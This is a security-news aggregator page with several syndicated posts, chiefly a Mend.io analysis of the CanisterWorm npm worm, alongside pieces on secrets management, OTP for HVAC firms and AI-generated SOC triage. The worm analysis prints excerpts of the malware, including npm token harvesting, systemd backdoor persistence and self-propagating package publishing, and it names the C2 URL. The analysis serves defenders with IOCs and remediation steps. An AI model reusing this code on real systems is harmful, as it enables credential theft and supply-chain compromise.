Capabilities and Limitations of Both Models</h2> <p>Secrets management is strongest when static credentials are unavoidable. It centralizes storage, enforces access controls, automates rotation, and creates the audit trails regulators expect. These capabilities reduce exposure from hardcoded credentials and support legacy systems that cannot authenticate using identity-based methods.</p> <p>Its limitations, however, stem from the nature of static credentials themselves. Applications still need a bootstrap credential to reach the vault, leaving the <a href="https://aembit.io/use-case/solving-the-secret-zero-problem/">secret-zero problem</a> unresolved. Credentials remain viable targets for attackers until rotated. Rotation introduces operational complexity, and vault availability becomes a dependency for every downstream service. As the environment grows, the number of secrets grows with it, increasing management overhead.</p> <p>Secretless authentication addresses those weaknesses by removing static credentials from the ecosystem. Workloads authenticate using identity, receive short-lived and narrowly scoped credentials, and operate without storing anything long-lived. This dramatically reduces the blast radius of a compromise and simplifies the developer experience by eliminating credential-handling code. Policies can be enforced in real time across clouds and pipelines.</p> <p>Secretless models bring their own constraints. They rely on uninterrupted identity infrastructure, require precise policy definitions, and are not yet supported by all systems, especially SaaS APIs and legacy databases that still depend on static keys. Some workloads may need refactoring to participate in identity-based authentication. In short, secretless reduces risk but increases reliance on modern identity foundations.</p> <h2>4. 
Operational Realities: What Teams Experience Daily</h2> <p>Both approaches promise to simplify security, but they shift where the complexity sits.</p> <h3>Developer Experience</h3> <p>With secrets management, developers write credential-fetching logic, handle rotation failures, and maintain separate configurations for every environment. Pipelines frequently break when a credential expires. New microservices require credential provisioning before any feature work begins.</p> <p>With secretless authentication, developers write no authentication code. The platform injects valid credentials at runtime or uses brokered identity-based access. Deployments no longer trigger credential updates, and rotation is invisible to developers.</p> <h3>Operations and SRE</h3> <p>Secrets management creates ongoing operational overhead. Vault clusters must be maintained, HA must be ensured, rotation windows must be coordinated, and every added service increases administrative complexity.</p> <p>Secretless platforms shift work from reactive credential maintenance to proactive policy governance. There are fewer emergency rotations and fewer late-night credential outages, but higher reliance on identity services and policy planning.</p> <h3>Security and Compliance</h3> <p>Secrets management improves auditability but keeps credentials in scope. Logs focus on who accessed which secret and when it was rotated.</p> <p>Secretless authentication focuses audits on identity assertions, policy decisions, and runtime access patterns. Because fewer credentials exist, compliance reviews often focus on policy governance rather than credential hygiene.</p> <h2>5. Risk Posture: Two Very Different Models</h2> <p>Secrets management reduces but does not eliminate credential risk. Attackers target vault tokens, extract secrets from memory, scrape logs, or compromise CI/CD systems. 
Static credentials remain valid until the next rotation, giving attackers a broader window for exploitation.</p> <p>These risks compound as organizations deploy AI agents that autonomously call dozens of APIs, each requiring its own credentials. A single compromised agent with hardcoded keys doesn’t just expose one service; it exposes every service the agent can reach.</p> <p>Secretless authentication removes the static credential entirely. A compromised workload cannot reveal a password because none exists. The primary risks shift to identity infrastructure outages or policy misconfigurations. The blast radius typically shrinks to a single workload instance or session.</p> <p>Both models reduce different kinds of risk. Secrets management reduces surface area; secretless architectures change the surface entirely.</p> <h2>6. Cost Considerations</h2> <p>The financial differences between the two models become clear as environments scale.</p> <h3>Secrets Management Costs</h3> <ul> <li>Vault infrastructure, backups, and disaster recovery</li> <li>Ongoing administration for policy updates, monitoring, and rotation</li> <li>Developer time spent writing and maintaining credential plumbing</li> <li>Operational burden during large-scale emergency rotations</li> </ul> <h3>Secretless Authentication Costs</h3> <p>Most of the investment occurs upfront:</p> <ul> <li>Deploying workload identity or federation</li> <li>Modernizing applications that depend on static secrets</li> <li>Training teams on identity-first patterns</li> <li>Establishing centralized policy governance</li> </ul> <p>Over time, the cost curve flattens. Rotation disappears. Per-service onboarding becomes easier. And emergency credential resets become rare.</p> <h2>7. Compliance Considerations</h2> <p>Compliance frameworks heavily influence how organizations treat machine credentials, but their requirements have evolved significantly. 
PCI DSS 4.0’s Requirement 8.6.3, which became mandatory after March 31, 2025, requires that passwords and passphrases for application and system accounts be changed periodically, with the frequency determined by a targeted risk analysis. This replaced the older assumption of fixed quarterly rotation with a risk-based approach. Organizations must still rotate credentials for service accounts, API keys, and other nonhuman identities, but the cadence is now tied to assessed risk rather than a rigid calendar.</p> <p>This shift matters because it opens the door to smarter credential governance. Organizations that reduce the number of static credentials through secretless patterns have fewer credentials subject to 8.6.3’s rotation requirements in the first place. For the credentials that remain, risk-based rotation replaces blanket schedules, reducing operational burden. Moving toward identity-first access simplifies the compliance narrative further by replacing periodic rotation with continuous identity verification for modern workloads.</p> <p>Secretless authentication does not remove compliance obligations; it changes their shape. Instead of proving that a password was updated every 90 days, teams demonstrate that no static credential existed and that every access was tied to a verified workload identity.</p> <h2>8. 
A Practical Decision Framework</h2> <p>A clean way to decide where to invest is to evaluate four dimensions.</p> <h3>Infrastructure Maturity</h3> <ul> <li>Cloud-native architectures benefit most from secretless approaches.</li> <li>Legacy or monolithic environments will rely heavily on secrets management.</li> </ul> <h3>Risk Tolerance</h3> <ul> <li>Eliminating attack vectors provides transformational risk reduction.</li> <li>Some organizations prefer incremental improvements through better governance.</li> </ul> <h3>Compliance Requirements</h3> <ul> <li>Secretless architectures simplify some compliance narratives by removing persistent credentials.</li> <li>Secrets management offers mature, auditor-friendly trails for regulated environments.</li> </ul> <h3>Team Capability</h3> <ul> <li>Secretless adoption requires comfort with identity, policy, and workload security.</li> <li>Secrets management aligns with existing operational models.</li> </ul> <p>For most organizations, the correct strategy is phased adoption: start secretless where identity is strong and rely on secrets management everywhere else.</p> <h2>9. The Strategic Investment Decision</h2> <p>Secrets management and secrets elimination are not competing fads; they are two tools designed for two eras of architecture. Secrets management strengthens what already exists. 
Secretless authentication prepares teams for cloud-native, automated environments where workloads, not humans, drive the majority of access.</p> <p>The most resilient organizations combine both: reduce secrets wherever possible, manage the unavoidable ones securely, and move steadily toward identity-backed, just-in-time access.</p> <p><a href="https://aembit.io/product-overview/">Aembit’s Workload IAM platform</a> enables this transition by providing identity federation, policy-based access control, and secretless authentication for modern workloads while coexisting with the secrets managers you already use.</p> <h2>Related Reading</h2> <ul> <li><a href="https://aembit.io/blog/solving-the-secret-zero-problem-with-workload-identity/">Solving the Secret Zero Problem with Workload Identity</a></li> <li><a href="https://aembit.io/blog/attestation-based-identity-hardware-cloud-security/">Attestation-Based Identity: How It Works and Why It Matters</a></li> <li><a href="https://aembit.io/blog/future-of-secrets-management-in-the-era-of-agentic-ai/">The Future of Secrets Management in the Era of Agentic AI</a></li> <li><a href="https://aembit.io/blog/key-management-solutions-for-non-human-identities-in-the-cloud/">Key Management Solutions for Non-Human Identities</a></li> <li><a href="https://aembit.io/blog/ci-cd-security-checklist-eliminate-secrets-workload-identity/">CI/CD Security Checklist: Secure Pipelines &amp; Eliminate Secrets</a></li> </ul></div> </div> </div> </div> </div><p>The post <a href="https://aembit.io/blog/secrets-management-vs-elimination/">Secrets Management vs. 
Secrets Elimination: Where Should You Invest?</a> appeared first on <a href="https://aembit.io/">Aembit</a>.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://aembit.io/">Aembit</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Dan Kaplan">Dan Kaplan</a>. Read the original post at: <a href="https://aembit.io/blog/secrets-management-vs-elimination/">https://aembit.io/blog/secrets-management-vs-elimination/</a> </p>

CanisterWorm: The Self-Spreading npm Attack That Uses a Decentralized Server to Stay Alive

  • Published date: 2026-03-21 00:00:00


<p>On March 20, 2026, at 20:45 UTC, <a href="https://www.aikido.dev/blog/teampcp-deploys-worm-npm-trivy-compromise" rel="noopener">Aikido</a> Security detected an unusual pattern across the npm registry: dozens of packages from multiple organizations were receiving unauthorized patch updates, all containing the same hidden malicious code. What they had caught was CanisterWorm, a self-spreading npm worm deployed by the threat actor group TeamPCP.</p>
<p>We track this incident as <strong>MSC-2026-3271</strong>.</p>
<p>CanisterWorm is explicitly designed to target <strong>Linux systems</strong>. Once installed, it plants a persistent backdoor that survives reboots using systemd, the standard Linux service manager, and connects to a command-and-control server built on the Internet Computer Protocol (ICP), a decentralized blockchain network. Because ICP has no single host or provider, the C2 infrastructure cannot be taken down through a conventional takedown request, making CanisterWorm the first publicly documented npm worm to use this technique.</p>
<p><strong>Important:</strong> While the persistent backdoor is Linux-only, the credential theft (Stage 1) and worm propagation (Stage 4) components execute on any platform. npm tokens on macOS and Windows machines are equally at risk of theft and abuse.<br>The worm affected <a href="https://docs.google.com/spreadsheets/d/1LO8vC1cl_1Ho4gr3msqvYT9C1AeZ_GaCFj2U-nzCLE0/edit?gid=1764127214#gid=1764127214" rel="noopener">more than 50 packages</a> across multiple npm scopes, including <code>@EmilGroup, @opengov, @teale.io/eslint-config, @airtm/uuid-base32</code>, and <code>@pypestream/floating-ui-dom</code>. Any developer or CI/CD pipeline that installed one of these packages also had its own npm credentials stolen and potentially used to spread the worm further through their own packages.</p>
<p>This post covers a technical breakdown of the attack, including the malware behavior, attribution to the threat actor, and some IOCs.</p>
<h2 class="wp-block-heading" id="background-how-teampcp-got-the-keys">Background: How TeamPCP Got the Keys</h2>
<p>CanisterWorm did not begin with npm. The credentials that seeded the initial infection wave were stolen hours earlier through a separate, <a href="https://thehackernews.com/2026/03/trivy-security-scanner-github-actions.html" rel="noopener">high-impact supply chain attack</a> on Trivy, Aqua Security’s widely-used open-source vulnerability scanner.</p>
<p>TeamPCP exploited a GitHub Actions misconfiguration involving a <code>pull_request_target</code> workflow that exposed a Personal Access Token (PAT). Using that stolen token, the attacker force-pushed malicious commits over 75 of 76 version tags on <code>aquasecurity/trivy-action</code> and 7 tags on <code>aquasecurity/setup-trivy</code>, effectively replacing the legitimate scanner with a credential harvester across thousands of CI/CD pipelines that ran that day.</p>
<p>The Trivy payload operated in three stages: enumerate secrets from the environment and filesystem, encrypt them, and silently exfiltrate them. What it collected included SSH keys, AWS and cloud provider credentials, database passwords, Kubernetes tokens, Docker configs, and npm authentication tokens. 
Those npm tokens became the launch pad for CanisterWorm less than 24 hours later.</p>
<p>This cascading structure, where one compromised tool becomes the credential source for a second, broader attack, is what makes TeamPCP’s campaign notable beyond the individual techniques involved.</p>
<h2 class="wp-block-heading" id="technical-analysis-of-the-canisterworm">Technical Analysis of the CanisterWorm</h2>
<h3 class="wp-block-heading" id="stage-1-the-postinstall-hook-that-runs-on-every-install">Stage 1: The Postinstall Hook That Runs on Every Install</h3>
<p>When you run <code>npm install</code>, npm automatically runs any script defined in a package’s <code>postinstall</code> field before the install completes. CanisterWorm abuses this standard feature to execute malicious code on the developer’s machine or CI/CD runner without any additional action required.</p>
<p>The <code>postinstall</code> entry in compromised <code>package.json</code> files pointed to <code>index.js</code>, which is the worm’s first-stage loader.</p>
<pre class="wp-block-code"><code>{
  "scripts": {
    "postinstall": "node index.js",
    "deploy": "node scripts/deploy.js"
  }
}</code></pre>
<p><sub>Figure 1: The <code>postinstall</code> trigger in compromised <code>package.json</code> files.</sub></p>
<p>The first thing <code>index.js</code> does is collect every npm authentication token it can find on the machine. 
It checks three places: <code>.npmrc</code> configuration files (in the home directory, current directory, and <code>/etc/npmrc</code>), environment variables matching patterns like <code>NPM_TOKEN</code> and <code>NPM_TOKENS</code>, and the live npm configuration via <code>npm config get</code>.</p>
<pre class="wp-block-code"><code>function findNpmTokens() {
  const tokens = new Set();
  const homeDir = os.homedir();
  const npmrcPaths = [
    path.join(homeDir, '.npmrc'),
    path.join(process.cwd(), '.npmrc'),
    '/etc/npmrc',
  ];
  for (const rcPath of npmrcPaths) {
    try {
      const content = fs.readFileSync(rcPath, 'utf8');
      for (const line of content.split('\n')) {
        const m = line.match(/(?:_authToken\s*=\s*|:_authToken=)([^\s]+)/);
        if (m &amp;&amp; m[1] &amp;&amp; !m[1].startsWith('${')) tokens.add(m[1].trim());
      }
    } catch (_) {}
  }
}</code></pre>
<p><sub>Figure 2: npm token harvesting searches <code>.npmrc</code> files, environment variables, and live npm config</sub></p>
<h3 class="wp-block-heading" id="stage-2-the-persistent-python-backdoor-that-survives-reboots">Stage 2: The Persistent Python Backdoor That Survives Reboots</h3>
<p>Once <code>index.js</code> has collected tokens, it installs a persistent backdoor on the host.</p>
<p>The loader decodes a base64-encoded Python script embedded in the package and writes it to <code>~/.local/share/pgmon/service.py</code>. It then creates a systemd user service (a standard Linux mechanism for running background processes) at <code>~/.config/systemd/user/pgmon.service</code> and immediately enables and starts it. 
This requires no administrator (root) access, which makes it harder to detect.</p>
<p>The name <code>pgmon</code> is intentional: it is designed to look like a PostgreSQL monitoring tool to anyone inspecting running services.</p>
<pre class="wp-block-code"><code>fs.writeFileSync(unitFilePath, [
  '[Unit]',
  `Description=${SERVICE_NAME}`,
  'After=default.target',
  '',
  '[Service]',
  'Type=simple',
  `ExecStart=/usr/bin/python3 ${scriptPath}`,
  'Restart=always',
  'RestartSec=5',
  '',
  '[Install]',
  'WantedBy=default.target',
].join('\n'), { mode: 0o644 });
execSync('systemctl --user daemon-reload', { stdio: 'pipe' });
execSync(`systemctl --user enable ${SERVICE_NAME}.service`, { stdio: 'pipe' });
execSync(`systemctl --user start ${SERVICE_NAME}.service`, { stdio: 'pipe' });</code></pre>
<p><sub>Figure 3: Systemd user service created by the loader for persistent backdoor execution</sub></p>
<p>The Python backdoor itself implements several techniques to avoid detection:</p>
<ul class="wp-block-list">
<li><strong>Sandbox evasion:</strong> It waits 5 minutes before doing anything on first run. Many automated malware analysis sandboxes time out before this delay expires.</li>
<li><strong>Low-frequency polling:</strong> It only checks for new instructions every ~50 minutes (3,000 seconds), making it harder to spot in network traffic.</li>
<li><strong>Browser impersonation:</strong> It spoofs a browser User-Agent header when making network requests.</li>
<li><strong>State tracking:</strong> It stores the last-fetched payload URL in <code>/tmp/.pg_state</code> to avoid re-executing the same payload on repeated polls.</li>
</ul>
<h3 class="wp-block-heading" id="stage-3-the-icp-canister-c2">Stage 3: The ICP Canister C2</h3>
<p>This is where CanisterWorm breaks new ground. 
Rather than communicating with a conventional web server (which can be seized, blocked, or taken offline), the Python backdoor polls an ICP canister for its instructions.</p>
<p>ICP (Internet Computer Protocol) is a decentralized blockchain network. A “canister” is a piece of code deployed on that network that runs autonomously. There is no single company or host that controls it, and it cannot be taken down through a conventional hosting provider takedown request. This makes it significantly more resilient than traditional C2 infrastructure.</p>
<p>The canister exposes three methods: <code>get_latest_link</code> (retrieve the current payload URL), <code>http_request</code> (serve that URL to the backdoor), and <code>update_link</code> (let the attacker rotate to a new payload without touching the infected packages). This means TeamPCP can change what executes on infected machines at any time, without republishing any npm package.</p>
<ul class="wp-block-list">
<li><strong>Canister ID:</strong> tdtqy-oyaaa-aaaae-af2dq-cai</li>
<li><strong>C2 URL:</strong> https://tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io/</li>
</ul>
<p>The backdoor downloads the URL returned by the canister, saves the binary to <code>/tmp/pglog</code>, and executes it. The attacker built in a kill-switch: if the returned URL contains <code>youtube.com</code>, the backdoor skips execution. At the time of discovery, the canister was returning a YouTube link, meaning the final payload stage was dormant but fully operational infrastructure was in place across infected machines.</p>
<h3 class="wp-block-heading" id="stage-4-the-self-propagating-worm-component">Stage 4: The Self-Propagating Worm Component</h3>
<p>The <code>scripts/deploy.js</code> component is what transforms this from a credential-stealing backdoor into a worm. A worm spreads itself automatically. 
A developer who installs an infected package and has npm credentials on their machine becomes an unwitting spreader, infecting their own packages without any knowledge or action on their part.</p>
<p><code>deploy.js</code> is launched as a completely detached background process after token harvesting. It then works through each stolen token:</p>
<ol class="wp-block-list">
<li>Authenticates with the npm registry to resolve the token’s associated username</li>
<li>Queries the npm search API to enumerate every package that user has publish access to</li>
<li>For each package, fetches the real README and latest published version from the registry</li>
<li>Bumps the patch version number (e.g., 1.8.11 becomes 1.8.12)</li>
<li>Temporarily overwrites the local <code>package.json</code> with the target package’s name and bumped version</li>
<li>Publishes the entire worm package under the victim’s package name with <code>--tag latest</code></li>
<li>Restores the original <code>package.json</code> and README locally, leaving no obvious traces</li>
</ol>
<pre class="wp-block-code"><code>async function deployWithToken(token, pkg, pkgPath, newVersion) {
  const whoami = await fetchJson('https://registry.npmjs.org/-/whoami', token);
  const username = whoami.username;
  const ownedPackages = await getOwnedPackages(username, token);
  for (const packageName of ownedPackages) {
    const { readme: remoteReadme, latestVersion } = await fetchPackageMeta(packageName, token);
    const publishVersion = latestVersion ? bumpPatch(latestVersion) : newVersion;
    const tempPkg = { ...pkg, name: packageName, version: publishVersion };
    fs.writeFileSync(pkgPath, JSON.stringify(tempPkg, null, 2) + '\n', 'utf8');
    run('npm publish --access public --tag latest', {
      env: { ...process.env, NPM_TOKEN: token },
    });
    fs.writeFileSync(pkgPath, originalPkgJson, 'utf8'); // restore
  }
}</code></pre>
<p><sub>Figure 4: Worm propagation publishes the malicious package under each victim’s owned package names</sub></p>
<p>Publishing with <code>--tag latest</code> means that any project running <code>npm install package-name</code> without pinning an exact version will automatically receive the infected version. The version bump makes the infected release appear to be a normal maintenance update.</p>
<h2 class="wp-block-heading" id="impact-analysis">Impact Analysis</h2>
<p>The worm’s design creates an exponential infection surface. Every developer machine or CI/CD pipeline that installs an infected package and has a stored npm token becomes a new propagation vector. Their packages get infected, their downstream users install those packages, and if any of those users have tokens, the cycle continues.</p>
<p>Because npm tokens are routinely stored in CI/CD environments, <code>.npmrc</code> files, and environment variables as standard developer workflow, the attack has a very high credential harvest rate in any professional software development environment.</p>
<p>The ICP-based C2 means that even after infected packages are removed from the registry, any machines that ran the <code>postinstall</code> hook retain a persistent, polling backdoor that will execute whatever payload the attacker rotates into the canister. 
Package removal from npm does not remediate infected hosts.</p><h2 class="wp-block-heading" id="indicators-of-compromise">Indicators of Compromise</h2><h3 class="wp-block-heading" id="filesystem-artifacts">Filesystem Artifacts</h3><figure class="wp-block-table"> <table class="has-fixed-layout"> <thead> <tr> <th><strong>Path</strong></th> <th><strong>Description</strong></th> </tr> </thead> <tbody> <tr> <td>~/.local/share/pgmon/service.py</td> <td>Persistent Python backdoor</td> </tr> <tr> <td>~/.config/systemd/user/pgmon.service</td> <td>Systemd user service</td> </tr> <tr> <td>/tmp/pglog</td> <td>Downloaded payload binary</td> </tr> <tr> <td>/tmp/.pg_state</td> <td>Payload URL state tracking file</td> </tr> </tbody> </table> </figure><h3 class="wp-block-heading" id="network-indicators">Network Indicators</h3><ul class="wp-block-list"> <li>hxxps://tdtqy-oyaaa-aaaae-af2dq-cai[.]raw[.]icp0[.]io/ (ICP C2 canister)</li> <li>hxxps://registry[.]npmjs[.]org/-/whoami (token validation)</li> <li>hxxps://registry[.]npmjs[.]org/-/v1/search?text=maintainer: (package enumeration)</li> </ul><h3 class="wp-block-heading" id="file-hashes-sha-256">File Hashes (SHA-256)</h3><p><a href="http://index.js/" rel="noopener"><strong>index.js</strong></a><strong>:</strong></p><p>E9b1e069efc778c1e77fb3f5fcc3bd3580bbc810604cbf4347897ddb4b8c163b</p><p>61ff00a81b19624adaad425b9129ba2f312f4ab76fb5ddc2c628a5037d31a4ba</p><p>0c0d206d5e68c0cf64d57ffa8bc5b1dad54f2dda52f24e96e02e237498cb9c3a</p><p>c37c0ae9641d2e5329fcdee847a756bf1140fdb7f0b7c78a40fdc39055e7d926</p><p><a href="http://deploy.js/" rel="noopener"><strong>deploy.js</strong></a><strong>:</strong></p><p>F398f06eefcd3558c38820a397e3193856e4e6e7c67f81ecc8e533275284b152</p><p>7df6cef7ab9aae2ea08f2f872f6456b5d51d896ddda907a238cd6668ccdc4bb7</p><p>5e2ba7c4c53fa6e0cef58011acdd50682cf83fb7b989712d2fcf1b5173bad956</p><h2 class="wp-block-heading" id="detection-and-remediation">Detection and Remediation</h2><h3 class="wp-block-heading" 
id="immediate-check-for-active-infection">Immediate: Check for Active Infection</h3>
<p>Check whether the systemd backdoor service is installed and running:</p>
<pre class="wp-block-code"><code>systemctl --user status pgmon.service
ls -la ~/.local/share/pgmon/
ls -la ~/.config/systemd/user/pgmon.service
ls -la /tmp/pglog /tmp/.pg_state</code></pre>
<p><sub>Figure 5: Commands to detect the pgmon backdoor service and associated files</sub></p>
<p>If any of these exist, the host ran a compromised package’s <code>postinstall</code> hook. Treat all credentials on that machine as compromised.</p>
<h3 class="wp-block-heading" id="remediation-remove-the-backdoor">Remediation: Remove the Backdoor</h3>
<pre class="wp-block-code"><code>systemctl --user stop pgmon.service
systemctl --user disable pgmon.service
rm -f ~/.config/systemd/user/pgmon.service
rm -rf ~/.local/share/pgmon/
rm -f /tmp/pglog /tmp/.pg_state
systemctl --user daemon-reload</code></pre>
<p><sub>Figure 6: Service removal and filesystem cleanup for infected hosts</sub></p>
<h3 class="wp-block-heading" id="critical-rotate-all-npm-credentials">Critical: Rotate All npm Credentials</h3>
<p>Any npm token present on the machine (in <code>.npmrc</code>, environment variables, or cached npm config) must be treated as stolen and revoked immediately. Log in to npmjs.com and revoke all existing tokens, then issue new ones. If the machine runs CI/CD workloads, rotate credentials in every pipeline that runs on that runner.</p>
<p>Audit any npm packages published from that machine or token in the 48 hours surrounding the infection window for unauthorized version bumps.</p>
<h2 class="wp-block-heading" id="attribution">Attribution</h2>
<p>TeamPCP is assessed to be a cloud-focused cybercriminal operation with demonstrated capability across GitHub Actions exploitation, npm registry abuse, and credential harvesting at scale. 
The Trivy attack and CanisterWorm campaign were executed within a 24-hour window, and the npm tokens harvested from the Trivy compromise directly seeded the initial wave of infections.</p><p>The code in CanisterWorm is assessed by researchers to have been developed rapidly with AI assistance. It is not obfuscated, and the logic is written explicitly and readably. The attacker prioritized speed of development and spread over stealth. </p><p>The group’s choice of ICP for C2 reflects deliberate infrastructure planning: the decentralized architecture was chosen specifically for its resistance to conventional takedown. This level of operational consideration, combined with the cascading multi-platform attack design, places TeamPCP above opportunistic script-kiddie activity.</p><h2 class="wp-block-heading" id="conclusion">Conclusion</h2><p>CanisterWorm represents a meaningful escalation in npm supply chain attacks. Self-spreading worms that propagate through developer credentials have been theorized for years; CanisterWorm puts the concept into practice with working code that was actively spreading in the wild. The use of a decentralized ICP canister for C2 eliminates the single takedown point that typically limits a campaign’s longevity.</p><p>The Trivy-to-npm pipeline also illustrates how a single compromised CI/CD tool can become a credential feeder for a much broader attack. Organizations that use Trivy for vulnerability scanning in their pipelines should treat any tokens present in those environments between March 19 and March 21, 2026, as potentially compromised.</p><p>Mend.io will continue monitoring for CanisterWorm activity and further TeamPCP campaigns. 
</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.mend.io">Mend</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Tom Abai">Tom Abai</a>. Read the original post at: <a href="https://www.mend.io/blog/canisterworm-the-self-spreading-npm-attack-that-uses-a-decentralized-server-to-stay-alive/">https://www.mend.io/blog/canisterworm-the-self-spreading-npm-attack-that-uses-a-decentralized-server-to-stay-alive/</a> </p>

How OTP Authentication Streamlines Service Delivery for HVAC Companies

  • Published date: 2026-03-21 00:00:00


<p><img decoding="async" src="https://cdn.pseo.one/67b62b766899109fe72fb789/687e6cccf6fe799d28851ea0/69be69575148ee4f7d63bbfe/content-image/aa7b6967-63fc-446d-9374-4879a2d281ca.webp" alt="aa7b6967-63fc-446d-9374-4879a2d281ca"></p><p>Photo courtesy of <a href="https://www.freepik.com/free-photo/male-plumber-working-with-client-fix-kitchen-problems_94957515.htm">Freepik</a></p><p>As HVAC businesses grow and expand into new areas, they need to find ways to manage more customers and staff. One of the biggest challenges is making sure that service delivery and payments are secure and efficient, especially when working with new customers in different locations.</p><p>A simple solution to this problem is one-time password (OTP) authentication. OTP authentication makes it easy to verify customers and payments quickly and securely, which helps HVAC companies improve their overall service process.</p><p>In this article, we’ll explore how OTP authentication helps HVAC companies streamline service delivery by improving customer verification, appointment scheduling, payments, and service completion, all while keeping things secure and simple.</p><h2>1. Simplified Customer Verification</h2><p>OTP (One-Time Password) authentication replaces <a href="https://mojoauth.com/ciam-101/authentication-server">traditional login methods</a> by sending a unique code to a customer’s phone or email, which they use to verify their identity instantly. For HVAC service appointments, customers can receive an OTP to confirm their identity, eliminating the need for passwords or lengthy forms.</p><h2>2. Enhanced Service Appointment Scheduling</h2><p>OTP authentication helps verify and confirm HVAC service appointments, ensuring both the customer and service provider are clear on the timing and details. When a customer schedules a service, they receive an OTP confirmation, which confirms the appointment and reduces the risk of any misunderstandings. 
</p><p>This process ensures that appointments are tracked accurately, leading to fewer scheduling errors and improved customer satisfaction. As you invest in marketing or <a href="https://www.wearetg.com/industry/hvac-seo-company/">HVAC SEO services</a> to generate more leads, it’s essential to have a reliable system for booking appointments to avoid confusion and ensure a smooth customer experience.</p><h2>3. Improved Payment and Transaction Security</h2><p>OTP authentication adds a layer of security to payments and transactions, protecting HVAC businesses and their customers. When a payment is made, an OTP is sent to the customer's phone or email to verify the transaction, ensuring it’s legitimate. This reduces the risk of fraud or unauthorized charges. </p><p>Additionally, OTP can prevent fraud from service vendors by confirming that payments are processed correctly and only authorized transactions are completed. This enhances security, builds trust, and ensures a reliable payment system for HVAC companies and their clients.</p><h2>4. Streamlined Service Completion Confirmation</h2><p>OTP authentication simplifies service completion verification. After an HVAC service is completed, an OTP is sent to the customer’s phone or email to confirm the work was done. This ensures clear communication and prevents any disputes about the service, making the process quicker and more reliable.</p><h2>5. Seamless Communication for Customer Support</h2><p>OTP authentication streamlines customer support by ensuring secure communication. When a customer contacts the HVAC company for assistance, they can verify their identity through OTP, <a href="https://www.fraud.com/post/account-verification">confirming they are the account holder</a>. This prevents unauthorized access to support channels and ensures that customer queries are handled by the right team.</p><h2>Endnote</h2><p>OTP authentication enhances security and simplifies key processes for HVAC businesses. 
By streamlining customer verification, service confirmations, and payments, it improves efficiency and builds trust. </p><p>Adopting OTP ensures smoother operations, better customer experience, and strengthens the company's competitive edge in a growing market. It’s a valuable investment for long-term success.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://mojoauth.com/blog">MojoAuth Blog - Passwordless Authentication &amp; Identity Solutions</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by MojoAuth Blog - Passwordless Authentication &amp; Identity Solutions">MojoAuth Blog - Passwordless Authentication &amp; Identity Solutions</a>. Read the original post at: <a href="https://mojoauth.com/blog/otp-authentication-for-hvac-services">https://mojoauth.com/blog/otp-authentication-for-hvac-services</a> </p>

This is Not Big News

  • Marcus Ranum
  • Published date: 2026-03-20 05:07:34

Apparently the Iranians managed to tag an F-35. As I mentioned in 2019, [stderr] stealth aircraft typically are mostly “stealthy” from the front, and some of them are quite un-stealthy from some angles, or if they have weapons bays open. It appears that the C…


French aircraft carrier’s location leaked by sailor using Strava on the ship deck

  • Anna Young
  • Published date: 2026-03-20 00:03:46

Strava, which is used by 120 million people around the world, allows runners and cyclists to log and share their workouts online.

A French seaman’s public fitness app revealed the exact location of a French aircraft carrier in the Mediterranean, a shocking security blunder amid rising tensions in the Middle East, a report found.…

Amazon Lost 6.3 Million Orders to Vibe Coding. Your SOC Is Next.

  • Published date: 2026-03-20 00:00:00


<p>The software industry has a new word for the torrent of low-quality, AI-generated code flooding production systems: <strong>slop</strong>. <a href="https://www.merriam-webster.com/wordplay/word-of-the-year" rel="noopener">Merriam-Webster named it Word of the Year for 2025</a>. The crisis hit its most visible peak when Amazon, after mandating 80% weekly usage of its AI coding assistant Kiro, suffered a six-hour outage that knocked out checkout, login, and product pricing, costing an estimated 6.3 million orders.</p><p>The same failure pattern is now emerging in security operations. And the consequences will be harder to detect.</p><h2 class="wp-block-heading">What Is Triage Slop?</h2><p>When Andrej Karpathy coined “vibe coding” in February 2025, he described a state where developers “fully give in to the vibes” and forget the code exists. Collins English Dictionary named it Word of the Year. The practice (describing what you want in natural language, accepting whatever the LLM generates, and shipping without review) produced measurable damage: 1.7 times more major issues, up to 2.7 times more XSS vulnerabilities, and a 23.5% increase in production incidents per pull request (<a href="https://www.coderabbit.ai/blog/ai-code-quality-2025" rel="noopener">CodeRabbit, December 2025</a>).</p><p><strong><a href="https://d3security.com/glossary/triage-slop/">Triage slop</a></strong> is the SOC equivalent: AI-generated alert classifications, investigation summaries, and response recommendations that look professional but lack the depth, context, and accuracy that security operations demand. The failure mode is identical: an inexperienced operator uses a natural language interface to produce output they cannot critically evaluate.</p><h2 class="wp-block-heading">The Junior-Senior Divide Applies to Analysts Too</h2><p>Amazon’s experience made the pattern undeniable. Junior and mid-level engineers accepted AI-generated code at high rates without catching subtle flaws. 
After the outages, Amazon issued a 90-day mandate requiring senior engineer sign-off on all AI-assisted production deployments.</p><p>D3 Security observed the same dynamic on our own engineering team during the 24-month development of <a href="https://d3security.com/morpheus/">Morpheus AI</a>. Junior developers produced code that required extensive rework. Senior developers, once they learned to direct the LLM with architectural intent, achieved up to 10 times their normal output.</p><p>The parallel to SOC operations is direct. The average enterprise SOC receives over 4,400 alerts per day. Analysts get 70 minutes per full investigation. When an AI tool presents a classification with a confidence score and a professional summary, a Tier-1 analyst under time pressure will accept it, just as a junior developer accepts generated code. The 61% of SOC teams that already report ignoring alerts later confirmed as genuine compromise are about to get a new mechanism for doing so. One wrapped in AI confidence scores.</p><h2 class="wp-block-heading">The Downstream Cascade</h2><p>These problems are directly connected. On March 18, 2026, the Linux Foundation announced a $12.5 million initiative (backed by Anthropic, AWS, GitHub, Google, Microsoft, and OpenAI) to address the open-source security crisis driven by AI-generated code. The National Vulnerability Database has over 30,000 CVEs backlogged.</p><p>More vulnerable code in production means more alerts. More alerts means more pressure on triage systems. More pressure means more temptation to accept AI-generated triage without review. The feedback loop is self-reinforcing.</p><h2 class="wp-block-heading">Why the Problem Is Architectural</h2><p>Three structural failures produce triage slop:</p><p><strong>General-purpose LLMs lack domain knowledge.</strong> A general-purpose model can summarize a phishing alert. 
